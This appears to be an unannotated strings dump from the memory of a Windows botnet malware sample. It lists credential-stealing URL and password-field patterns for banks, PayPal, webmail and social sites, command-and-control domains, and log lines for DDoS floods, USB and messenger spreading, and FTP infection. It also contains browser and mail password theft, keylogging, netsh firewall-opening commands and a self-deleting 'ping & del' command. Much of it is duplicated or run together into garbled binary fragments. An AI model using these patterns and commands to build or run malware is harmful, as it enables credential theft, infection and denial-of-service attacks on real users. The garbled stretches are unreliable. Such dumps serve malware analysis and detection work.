Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
hXXp://%s/%s
hXXp://%s/%s
hXXp://%s/
hXXp://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
hXXp://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
/c "start %Ã%%.Trashes\%s
.Trashes
.Trashes
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.scr
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
a.baerr000.ru
a.baerr000.ru
a.joerv06.com
a.joerv06.com
a.tsroxybaa.com
a.tsroxybaa.com
fbi.gov
fbi.gov
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
\\.\pipe\312a36d2
\\.\pipe\312a36d2
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
C:\Windows
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 767
7 767
8*808;8~8
8*808;8~8
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
/C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
/C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
c:\%original file name%.exe
c:\%original file name%.exe
twunk_16.exe_3204_rwx_002A0000_00021000:
.text
.text
`.rdata
`.rdata
@.data
@.data
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
SHLWAPI.dll
SHLWAPI.dll
PSAPI.DLL
PSAPI.DLL
CRYPT32.dll
CRYPT32.dll
`0%x"
`0%x"
[8FTp}
[8FTp}
.QzQD
.QzQD
M .TI
M .TI
.Jg%4
.Jg%4
H.nH_
H.nH_
]`rDo%c
]`rDo%c
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
ping 127.0.0.1 -n 3&del "%s"
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
%s /c del %s
\kernel32.dll
\kernel32.dll
%s %s
%s %s
explorer.exe
explorer.exe
twunk_16.exe_3204_rwx_00400000_00022000:
.text
.text
`.rdata
`.rdata
@.data
@.data
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
SHLWAPI.dll
SHLWAPI.dll
PSAPI.DLL
PSAPI.DLL
CRYPT32.dll
CRYPT32.dll
`0%x"
`0%x"
[8FTp}
[8FTp}
.QzQD
.QzQD
M .TI
M .TI
.Jg%4
.Jg%4
H.nH_
H.nH_
]`rDo%c
]`rDo%c
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
ping 127.0.0.1 -n 3&del "%s"
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
%s /c del %s
\kernel32.dll
\kernel32.dll
%s %s
%s %s
explorer.exe
explorer.exe
twunk_16.exe_3204_rwx_00560000_00051000:
0U'%u
0U'%u
3'.tN
3'.tN
: %s;q
^.BL(
.UHi)
SQLnnZj
lTzsQLttwunk_16.exe_3392_rwx_00170000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
Fv.TBv
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
.Trashes
\\.\%c:
%s\%s
%sautorun.tmp
%sautorun.inf
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
a.baerr000.ru
a.joerv06.com
a.tsroxybaa.com
fbi.gov
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
\\.\pipe\312a36d2
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 7678*808;8~8%s\Microsoft\%s.exe\\.\pipeInternet Explorer\iexplore.exeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\Desktop.iniwinlogon.exemspaint.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe^C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exec:\%original file name%.exetwunk_16.exe_3392_rwx_00400000_00049000:.text`.rdata@.data.relocASSSSSShD$ PASSf%s:ZKTDJRBHOEUDXGET %s HTTP/1.1Host: %sUser-Agent: %sMozilla/%i.0 (Windows NT %i.%i; %srv:%i.0) Gecko/20100101 Firefox/%i.0Mozilla/%i.0 (compatible; MSIE %i.0; Windows NT %i.%i; Trident/%i.0)_wv=%snetwork.http.spdy.enabled.v3-1network.http.spdy.enablednetwork.http.spdy.enabled.http2PTF://%s:%s@%s:%dSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsHttpSendRequestWRegOpenKeyExWRegCloseKey%s\%ls\dmps\log.txt%s\%ls\dmps\%slog.txt%slogs.cab%s\Thunderbird\profiles.ini%s\Thunderbird\%sThunderbird.Url.news\DefaultIconType - Mail | Name - %s | User - %s | Password - %s&HTTPMail User NameHTTPMail Password2POP3 Password2pstorec.dll%s%c%c\logins.json%snss3.dllPK11_GetInternalKeySlotPK11_CheckUserPasswordencryptedPassword":hXXps://-----------------------------%dContent-Disposition: form-data; name="data"; filename="%S"POST %s HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-Type: multipart/form-data; boundary=---------------------------%dContent-Length: %dRegOpenKeyARegOpenKeyExAGetProcessHeapKERNEL32.dllGetKeyNameTextWGetAsyncKeyStateGetKeyboardLayoutGetKeyboardStateGetKeyStateMapVirtualKeyWUSER32.dllGDI32.dllRegDeleteKeyWRegEnumKeyExARegCreateKeyExARegCreateKeyExWADVAPI32.dllSHELL32.dllole32.dllOLEAUT32.dllMSVCRT.dll_acmdlnntdll.dllWININET.dllCRYPT32.dllSHLWAPI.dllWS2_32.dllGdiplusShutdowngdiplus.dllUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Content-type: application/x-www-form-urlencodednetsh firewall add allowedprogram "%s" %s ENABLEnetsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s"cabinet.dllchrome.dllWs2_32.dll%ls\screenshot.jpg\settings3.bin\settings.rdpws2_32.dllwininet.dllf/s %sxul.dllnss3.dllnspr4.dllWininet.dllokernel32.dllWin Srv 2008Win Srv 2003Win SrvWin XP
d.d.d
[ %s | Time - d:d (d.d.%d) ]
%S\%i.jpg
dAccount65.stg
Accounts70.tdat
Account71.rec0
Account.rec0
\kernel32.dll
%s %s
PGdiPlus.dll
schannel.dll
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
filezilla.exe
ftprush.exe
winscp.exe
corePTF.exe
freePTF.exe
far.exe
ftpte.exe
smartPTF.exe
flashfxp.exe
totalcmd.execsrss.exe_368_rwx_02080000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
Fv.TBv
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
